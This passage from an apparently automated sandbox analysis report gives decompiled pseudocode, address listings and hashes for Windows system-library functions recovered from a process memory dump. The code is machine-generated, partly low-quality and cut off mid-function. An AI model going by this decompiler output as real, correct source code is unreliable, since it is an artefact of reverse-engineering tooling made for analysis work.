						if(_t47 != 0) {
							L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L033C4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E033E9650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                          0x03423893
                                          0x03423896
                                          0x03423899
                                          0x0342389f
                                          0x034238a0
                                          0x034238a4
                                          0x034238a9
                                          0x034238ac
                                          0x034238ad
                                          0x034238ae
                                          0x034238af
                                          0x034238b1
                                          0x034238b4
                                          0x034238bb
                                          0x034238bc
                                          0x034238bd
                                          0x034238c4
                                          0x034238c8
                                          0x034238ca
                                          0x034238ca
                                          0x034238d5
                                          0x0342393e
                                          0x03423940
                                          0x03423942
                                          0x03423952
                                          0x03423954
                                          0x03423961
                                          0x03423961
                                          0x03423967
                                          0x0342396e
                                          0x0342396e
                                          0x03423947
                                          0x0342394c
                                          0x00000000
                                          0x0342394c
                                          0x034238ea
                                          0x034238ee
                                          0x034238f8
                                          0x034238f9
                                          0x034238ff
                                          0x03423900
                                          0x03423902
                                          0x03423903
                                          0x0342390b
                                          0x0342390f
                                          0x03423950
                                          0x00000000
                                          0x03423950
                                          0x03423915
                                          0x0342391d
                                          0x0342391d
                                          0x03423922
                                          0x03423926
                                          0x00000000
                                          0x03423928
                                          0x0342392b
                                          0x0342392b
                                          0x03423935
                                          0x03423937
                                          0x03423937
                                          0x00000000
                                          0x03423935
                                          0x03423926
                                          0x034238f0
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: BinaryName
                                          • API String ID: 0-215506332
                                          • Opcode ID: 278bc9c3d603138fdfcba19bd80148fb73591e19d0af77e95eb57c1526dcc912
                                          • Instruction ID: 54c5b663b16ccdce80a915f35253eabc192735d22b01e11099e7b1300228bd0b
                                          • Opcode Fuzzy Hash: 278bc9c3d603138fdfcba19bd80148fb73591e19d0af77e95eb57c1526dcc912
                                          • Instruction Fuzzy Hash: 6E31383AD00629AFDB15DE5AC945E7BFB78EB41B20F01416AE914BF340D7349E00CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033DD294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 33%
                                          			E033DD294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x349d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E033C4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E033EB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E033E98D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E033E95D0();
					L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                          0x033dd29c
                                          0x033dd2a6
                                          0x033dd2b1
                                          0x033dd2b5
                                          0x033dd2b6
                                          0x033dd2bc
                                          0x033dd2bd
                                          0x033dd2be
                                          0x033dd2bf
                                          0x033dd2c2
                                          0x033dd2c4
                                          0x033dd2cc
                                          0x033dd384
                                          0x033dd34b
                                          0x033dd34f
                                          0x033dd350
                                          0x033dd351
                                          0x033dd35c
                                          0x033dd35c
                                          0x033dd2d6
                                          0x033dd2da
                                          0x033dd2e1
                                          0x033dd361
                                          0x033dd369
                                          0x033dd36d
                                          0x033dd2e3
                                          0x033dd2e3
                                          0x033dd2e3
                                          0x033dd2e5
                                          0x033dd2ed
                                          0x033dd2f5
                                          0x033dd2fa
                                          0x033dd302
                                          0x033dd303
                                          0x033dd30b
                                          0x033dd30f
                                          0x033dd313
                                          0x033dd318
                                          0x033dd31c
                                          0x033dd320
                                          0x033dd379
                                          0x033dd37d
                                          0x00000000
                                          0x00000000
                                          0x0341affe
                                          0x0341b001
                                          0x0341b011
                                          0x00000000
                                          0x033dd322
                                          0x033dd322
                                          0x033dd330
                                          0x033dd337
                                          0x033dd35d
                                          0x033dd339
                                          0x033dd33f
                                          0x033dd38c
                                          0x033dd38c
                                          0x033dd33f
                                          0x033dd349
                                          0x00000000
                                          0x033dd349

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: @
                                          • API String ID: 0-2766056989
                                          • Opcode ID: e4ca0e3c3ec2965581c10c863ad6e18bba986cfdc1f820db4a54b47a22e6e948
                                          • Instruction ID: 9f85fe74b0e51181e7486e7ddac6017caa4d4c225fdc26c85ba77b7b9d6e1cb1
                                          • Opcode Fuzzy Hash: e4ca0e3c3ec2965581c10c863ad6e18bba986cfdc1f820db4a54b47a22e6e948
                                          • Instruction Fuzzy Hash: 2B31BCB6908345AFC721DF28D9C0A6BBBECEF89654F04092EF99487A50D634DD05CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033B1B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 72%
                                          			E033B1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E033EBB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E033EA9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E033EA9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L033C4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                          0x033b1b8f
                                          0x033b1b9a
                                          0x033b1b9c
                                          0x033b1b9e
                                          0x033b1ba3
                                          0x03407010
                                          0x03407010
                                          0x00000000
                                          0x033b1ba9
                                          0x033b1ba9
                                          0x033b1bae
                                          0x00000000
                                          0x033b1bc5
                                          0x033b1bca
                                          0x033b1bcf
                                          0x033b1bd0
                                          0x033b1bd1
                                          0x033b1bd2
                                          0x033b1bd6
                                          0x033b1bdc
                                          0x033b1be0
                                          0x03406ffc
                                          0x03407000
                                          0x00000000
                                          0x03407006
                                          0x03407009
                                          0x03407009
                                          0x033b1be6
                                          0x033b1bec
                                          0x033b1c0b
                                          0x033b1c0b
                                          0x033b1c0c
                                          0x033b1c11
                                          0x033b1c12
                                          0x033b1c15
                                          0x033b1c1b
                                          0x033b1c1f
                                          0x033b1c31
                                          0x033b1c33
                                          0x03407026
                                          0x03407026
                                          0x033b1c21
                                          0x033b1c24
                                          0x033b1c24
                                          0x033b1bee
                                          0x033b1bee
                                          0x033b1bf2
                                          0x033b1c3a
                                          0x033b1bf4
                                          0x033b1bf4
                                          0x033b1c05
                                          0x033b1c05
                                          0x033b1c09
                                          0x033b1c3e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x033b1c09
                                          0x033b1bec
                                          0x033b1be0
                                          0x033b1bae
                                          0x033b1c2e

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: WindowsExcludedProcs
                                          • API String ID: 0-3583428290
                                          • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                          • Instruction ID: 8262bfdcb9afd951ce8feea660195858afa90ba6e9c2909e101e57bcfef1e978
                                          • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                          • Instruction Fuzzy Hash: 6C21F836E01228ABCB21DE5589D0F9BF7BDEF80650F0A4466FE048F600D630DD0097E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033CF716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E033CF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                          0x033cf71d
                                          0x033cf722
                                          0x033cf726
                                          0x03414770
                                          0x033cf765
                                          0x033cf769
                                          0x033cf769
                                          0x033cf732
                                          0x0341477a
                                          0x00000000
                                          0x0341477a
                                          0x033cf738
                                          0x033cf73a
                                          0x033cf73c
                                          0x033cf73f
                                          0x033cf746
                                          0x033cf778
                                          0x033cf7a9
                                          0x033cf7a9
                                          0x033cf754
                                          0x033cf75a
                                          0x033cf75d
                                          0x033cf75f
                                          0x033cf761
                                          0x033cf76f
                                          0x033cf771
                                          0x033cf771
                                          0x033cf76f
                                          0x033cf763
                                          0x00000000
                                          0x033cf763
                                          0x033cf77d
                                          0x033cf7a3
                                          0x033cf7a5
                                          0x00000000
                                          0x033cf7a5
                                          0x033cf77f
                                          0x033cf782
                                          0x033cf784
                                          0x033cf786
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x033cf788
                                          0x033cf748
                                          0x033cf74d
                                          0x033cf78d
                                          0x033cf793
                                          0x033cf7b7
                                          0x033cf7bc
                                          0x00000000
                                          0x033cf7bc
                                          0x033cf798
                                          0x00000000
                                          0x00000000
                                          0x033cf79d
                                          0x033cf7b0
                                          0x00000000
                                          0x033cf7b0
                                          0x033cf79f
                                          0x00000000
                                          0x033cf74f
                                          0x033cf74f
                                          0x00000000
                                          0x033cf74f

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: Actx
                                          • API String ID: 0-89312691
                                          • Opcode ID: 3e70202e792380382527de5cad551b85592fec759004069759f46969ae3e4573
                                          • Instruction ID: 5f6d8c94ef90a99502c5db1323607fa1db5f95594f03bd8eb2526766ad1f7523
                                          • Opcode Fuzzy Hash: 3e70202e792380382527de5cad551b85592fec759004069759f46969ae3e4573
                                          • Instruction Fuzzy Hash: 8E1190393247828BEB24DF1D88D0736B29FAB866E4F28452EF461CBB91DA74CC408340
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03458DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 71%
                                          			E03458DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x3480d50);
				E033FD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E03435720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L033FDEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L033FDEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E033FD130(_t34, _t39, _t40);
			}





                                          0x03458df1
                                          0x03458df1
                                          0x03458df1
                                          0x03458df1
                                          0x03458df1
                                          0x03458df1
                                          0x03458df3
                                          0x03458df8
                                          0x03458dfd
                                          0x03458e00
                                          0x03458e0e
                                          0x03458e2a
                                          0x03458e36
                                          0x03458e38
                                          0x03458e3c
                                          0x03458e46
                                          0x03458e46
                                          0x03458e36
                                          0x03458e50
                                          0x03458e56
                                          0x03458e59
                                          0x03458e5c
                                          0x03458e60
                                          0x03458e67
                                          0x03458e6d
                                          0x03458e73
                                          0x03458e74
                                          0x03458eb1
                                          0x03458ebd

                                          Strings
                                          • Critical error detected %lx, xrefs: 03458E21
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: Critical error detected %lx
                                          • API String ID: 0-802127002
                                          • Opcode ID: af0c32246398ac9fac13c0bf439bf48ee146dde6748379b7c9d590cfba9b1116
                                          • Instruction ID: 51bb976488638836660f540f6a9cc8120306628d37acbdebaa0042db516002d5
                                          • Opcode Fuzzy Hash: af0c32246398ac9fac13c0bf439bf48ee146dde6748379b7c9d590cfba9b1116
                                          • Instruction Fuzzy Hash: 9A117975E50348DEDF24DFA8894979DBBB0AB04314F24425EE529AF392C7340602CF19
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0343FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                          Download Yara Rule
                                          Strings
                                          • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0343FF60
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                          • API String ID: 0-1911121157
                                          • Opcode ID: cb59bef2ba92df1c1c1ee6b517aa42d378732a557949344dcb567506f18f9f07
                                          • Instruction ID: 4e01f235ab194df203790eb67df582a48202eb538e1ec900991bd537f1f83cc5
                                          • Opcode Fuzzy Hash: cb59bef2ba92df1c1c1ee6b517aa42d378732a557949344dcb567506f18f9f07
                                          • Instruction Fuzzy Hash: 52110075D20644EFDF22EB50C888F9DBBB1FF0A704F688096E5096F2A1C7389948DB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033AF900, Relevance: .9, Instructions: 863COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 99%
                                          			E033AF900(signed int _a4, signed int _a8) {
				signed char _v5;
				signed char _v6;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed char _t285;
				signed int _t289;
				signed char _t292;
				signed int _t293;
				signed char _t295;
				signed int _t300;
				signed int _t301;
				signed char _t306;
				signed char _t307;
				signed char _t308;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed char _t314;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t322;
				signed int _t323;
				signed int _t328;
				signed char _t329;
				signed int _t337;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				signed int _t348;
				signed char _t350;
				signed int _t351;
				signed char _t353;
				signed char _t356;
				signed int _t357;
				signed char _t359;
				signed int _t360;
				signed char _t363;
				signed int _t364;
				signed int _t366;
				signed int* _t372;
				signed char _t373;
				signed char _t378;
				signed int _t379;
				signed int* _t382;
				signed int _t383;
				signed char _t385;
				signed int _t387;
				signed int _t388;
				signed char _t390;
				signed int _t393;
				signed int _t395;
				signed char _t397;
				signed int _t401;
				signed int _t405;
				signed int _t407;
				signed int _t409;
				signed int _t410;
				signed int _t413;
				signed char _t415;
				signed int _t416;
				signed char _t418;
				signed int _t419;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed char* _t425;
				signed char _t426;
				signed char _t427;
				signed int _t428;
				signed int _t429;
				signed int _t431;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t452;
				signed int _t454;
				signed int _t455;
				signed int _t456;
				signed int _t457;
				signed int _t461;
				signed int _t462;
				signed int _t464;
				signed int _t467;
				signed int _t470;
				signed int _t474;
				signed int _t475;
				signed int _t477;
				signed int _t481;
				signed int _t483;
				signed int _t486;
				signed int _t487;
				signed int _t488;

				_t285 =  *(_a4 + 4);
				_t444 = _a8;
				_t452 =  *_t444;
				_t421 = _t285 & 1;
				if(_t421 != 0) {
					if(_t452 != 0) {
						_t452 = _t452 ^ _t444;
					}
				}
				_t393 =  *(_t444 + 4);
				if(_t421 != 0) {
					if(_t393 != 0) {
						_t393 = _t393 ^ _t444;
					}
				}
				_t426 = _t393;
				if(_t452 != 0) {
					_t426 = _t452;
				}
				_v5 = _t285 & 0x00000001;
				asm("sbb eax, eax");
				if((_t393 &  ~_t452) != 0) {
					_t289 = _t393;
					_t427 = _v5;
					_t422 = _t393;
					_v12 = _t393;
					_v16 = 1;
					if( *_t393 != 0) {
						_v16 = _v16 & 0x00000000;
						_t445 =  *_t393;
						goto L115;
						L116:
						_t289 = _t445;
						L117:
						_t445 =  *_t289;
						if(_t445 != 0) {
							L115:
							_t422 = _t289;
							if(_t427 != 0) {
								goto L183;
							}
							goto L116;
						} else {
							_t444 = _a8;
							_v12 = _t289;
							goto L27;
						}
						L183:
						if(_t445 == 0) {
							goto L116;
						}
						_t289 = _t289 ^ _t445;
						goto L117;
					}
					L27:
					if(_t427 != 0) {
						if(_t452 == 0) {
							goto L28;
						}
						_t428 = _t289 ^ _t452;
						L29:
						 *_t289 = _t428;
						_t429 =  *(_t452 + 8);
						_v20 = _t429;
						_t426 = _t429 & 0xfffffffc;
						_t292 =  *(_a4 + 4) & 0x00000001;
						_v6 = _t292;
						_t293 = _v12;
						if(_t292 != 0) {
							if(_t426 != 0) {
								_t426 = _t426 ^ _t452;
							}
						}
						if(_t426 != _t444) {
							L174:
							_t423 = 0x1d;
							asm("int 0x29");
							goto L175;
						} else {
							_t436 = _t293;
							if(_v6 != 0) {
								_t436 = _t436 ^ _t452;
							}
							_v20 = _v20 & 0x00000003;
							_v20 = _v20 | _t436;
							 *(_t452 + 8) = _v20;
							_t426 =  *(_t393 + 8) & 0xfffffffc;
							_t356 =  *(_a4 + 4) & 0x00000001;
							_v6 = _t356;
							_t357 = _v12;
							if(_t356 != 0) {
								if(_t426 != 0) {
									_t426 = _t426 ^ _t393;
								}
							}
							if(_t426 != _t444) {
								goto L174;
							} else {
								_t483 = _t393 ^ _t357;
								_v24 = _t483;
								if(_v6 == 0) {
									_v24 = _t357;
								}
								 *(_t393 + 8) =  *(_t393 + 8) & 0x00000003 | _v24;
								_t426 =  *(_t357 + 4);
								_t444 = _a8;
								_t359 =  *(_a4 + 4) & 0x00000001;
								_v6 = _t359;
								_t360 = _v12;
								_v24 = _t483;
								if(_t359 != 0) {
									_v24 = _t483;
									if(_t426 == 0) {
										goto L37;
									}
									_t426 = _t426 ^ _t360;
									L38:
									if(_v6 == 0) {
										_t483 = _t393;
									}
									_t413 =  *(_t360 + 8);
									 *(_t360 + 4) = _t483;
									_t452 = _t413 & 0xfffffffc;
									_v5 = _t413;
									_t363 =  *(_a4 + 4) & 0x00000001;
									_v6 = _t363;
									if(_t363 != 0) {
										_t364 = _v12;
										_v5 = _t413;
										if(_t452 == 0) {
											goto L41;
										}
										_v20 = _t452;
										_v20 = _v20 ^ _t364;
										L42:
										if(_v20 != _t422) {
											_v5 = _t413;
											if(_v6 == 0) {
												L199:
												_t366 = _v12;
												L200:
												if(_t452 != 0 || _t366 != _t422) {
													goto L174;
												} else {
													goto L43;
												}
											}
											_t366 = _v12;
											_v5 = _t413;
											if(_t452 == 0) {
												goto L199;
											}
											_t452 = _t452 ^ _t366;
											goto L200;
										}
										L43:
										_t486 =  *(_t444 + 8) & 0xfffffffc;
										if(_v6 != 0) {
											if(_t486 != 0) {
												_t486 = _t486 ^ _t444;
											}
											if(_v6 != 0 && _t486 != 0) {
												_t486 = _t486 ^ _t366;
											}
										}
										_t415 = _t413 & 0x00000003 | _t486;
										 *(_t366 + 8) = _t415;
										_t416 = _v12;
										 *(_t416 + 8) = ( *(_t444 + 8) ^ _t415) & 0x00000001 ^ _t415;
										_t452 =  *(_t444 + 8);
										_t372 = _a4;
										if((_t452 & 0xfffffffc) == 0) {
											if( *_t372 != _t444) {
												goto L174;
											} else {
												 *_t372 = _t416;
												goto L52;
											}
										} else {
											_t452 = _t452 & 0xfffffffc;
											_t378 = _t372[1] & 0x00000001;
											_v6 = _t378;
											if(_t378 != 0) {
												if(_t452 != 0) {
													_t452 = _t452 ^ _t444;
												}
											}
											_t379 =  *(_t452 + 4);
											if(_v6 != 0) {
												if(_t379 != 0) {
													_t379 = _t379 ^ _t452;
												}
											}
											_v24 = _t379;
											_t382 = _t452 + (0 | _v24 == _t444) * 4;
											_v28 = _t382;
											_t383 =  *_t382;
											if(_v6 != 0) {
												if(_t383 != 0) {
													_t383 = _t383 ^ _t452;
												}
											}
											if(_t383 != _t444) {
												goto L174;
											} else {
												if(_v6 != 0) {
													_t487 = _t452 ^ _t416;
												} else {
													_t487 = _t416;
												}
												 *_v28 = _t487;
												L52:
												_t373 = _v5;
												L12:
												_t452 = _a4;
												_v5 = _t373 & 0x00000001;
												if(( *(_t452 + 4) & 0x00000001) != 0) {
													if(_t426 == 0) {
														goto L13;
													}
													_t306 = _t422 ^ _t426;
													L14:
													_t444 = _v16;
													 *(_t422 + _t444 * 4) = _t306;
													if(_t426 != 0) {
														_t306 =  *(_t426 + 8) & 0xfffffffc;
														_t418 =  *(_t452 + 4) & 0x00000001;
														_v6 = _t418;
														_t419 = _v12;
														if(_t418 != 0) {
															if(_t306 != 0) {
																_t306 = _t306 ^ _t426;
															}
														}
														if(_t306 != _t419) {
															goto L174;
														} else {
															if(_v6 != 0) {
																if(_t422 != 0) {
																	_t422 = _t422 ^ _t426;
																}
															}
															 *(_t426 + 8) = _t422;
															L24:
															return _t306;
														}
													}
													if(_v5 != _t426) {
														goto L24;
													} else {
														_t395 = _t452;
														_t306 =  *(_t395 + 4);
														L17:
														_t446 = _t423;
														_t434 = _v16 ^ 0x00000001;
														_v24 = _t446;
														_v12 = _t434;
														_t452 =  *(_t423 + _t434 * 4);
														if((_t306 & 0x00000001) != 0) {
															if(_t452 == 0) {
																goto L18;
															}
															_t426 = _t452 ^ _t446;
															L19:
															if(( *(_t426 + 8) & 0x00000001) != 0) {
																_t310 =  *(_t426 + 8) & 0xfffffffc;
																_t444 = _t306 & 1;
																if(_t444 != 0) {
																	if(_t310 != 0) {
																		_t310 = _t310 ^ _t426;
																	}
																}
																if(_t310 != _t423) {
																	goto L174;
																} else {
																	if(_t444 != 0) {
																		if(_t452 != 0) {
																			_t452 = _t452 ^ _t423;
																		}
																	}
																	if(_t452 != _t426) {
																		goto L174;
																	} else {
																		_t452 =  *(_t423 + 8) & 0xfffffffc;
																		if(_t444 != 0) {
																			if(_t452 == 0) {
																				L170:
																				if( *_t395 != _t423) {
																					goto L174;
																				} else {
																					 *_t395 = _t426;
																					L140:
																					if(_t444 != 0) {
																						if(_t452 != 0) {
																							_t452 = _t452 ^ _t426;
																						}
																					}
																					 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t452;
																					_t300 =  *(_t426 + _v16 * 4);
																					if(_t444 != 0) {
																						if(_t300 == 0) {
																							goto L143;
																						}
																						_t300 = _t300 ^ _t426;
																						goto L142;
																					} else {
																						L142:
																						if(_t300 != 0) {
																							_t401 =  *(_t300 + 8);
																							_t452 = _t401 & 0xfffffffc;
																							if(_t444 != 0) {
																								if(_t452 != 0) {
																									_t452 = _t452 ^ _t300;
																								}
																							}
																							if(_t452 != _t426) {
																								goto L174;
																							} else {
																								if(_t444 != 0) {
																									_t481 = _t300 ^ _t423;
																								} else {
																									_t481 = _t423;
																								}
																								 *(_t300 + 8) = _t401 & 0x00000003 | _t481;
																								goto L143;
																							}
																						}
																						L143:
																						if(_t444 != 0) {
																							if(_t300 != 0) {
																								_t300 = _t300 ^ _t423;
																							}
																						}
																						 *(_t423 + _v12 * 4) = _t300;
																						_t454 = _t426;
																						if(_t444 != 0) {
																							_t455 = _t454 ^ _t423;
																							_t301 = _t455;
																						} else {
																							_t301 = _t423;
																							_t455 = _t454 ^ _t301;
																						}
																						 *(_t426 + _v16 * 4) = _t301;
																						_t395 = _a4;
																						if(_t444 == 0) {
																							_t455 = _t426;
																						}
																						 *(_t423 + 8) =  *(_t423 + 8) & 0x00000003 | _t455;
																						 *(_t426 + 8) =  *(_t426 + 8) & 0x000000fe;
																						 *(_t423 + 8) =  *(_t423 + 8) | 0x00000001;
																						_t426 =  *(_t423 + _v12 * 4);
																						_t306 =  *(_t395 + 4);
																						if((_t306 & 0x00000001) != 0) {
																							if(_t426 != 0) {
																								_t426 = _t426 ^ _t423;
																							}
																						}
																						_t446 = _v24;
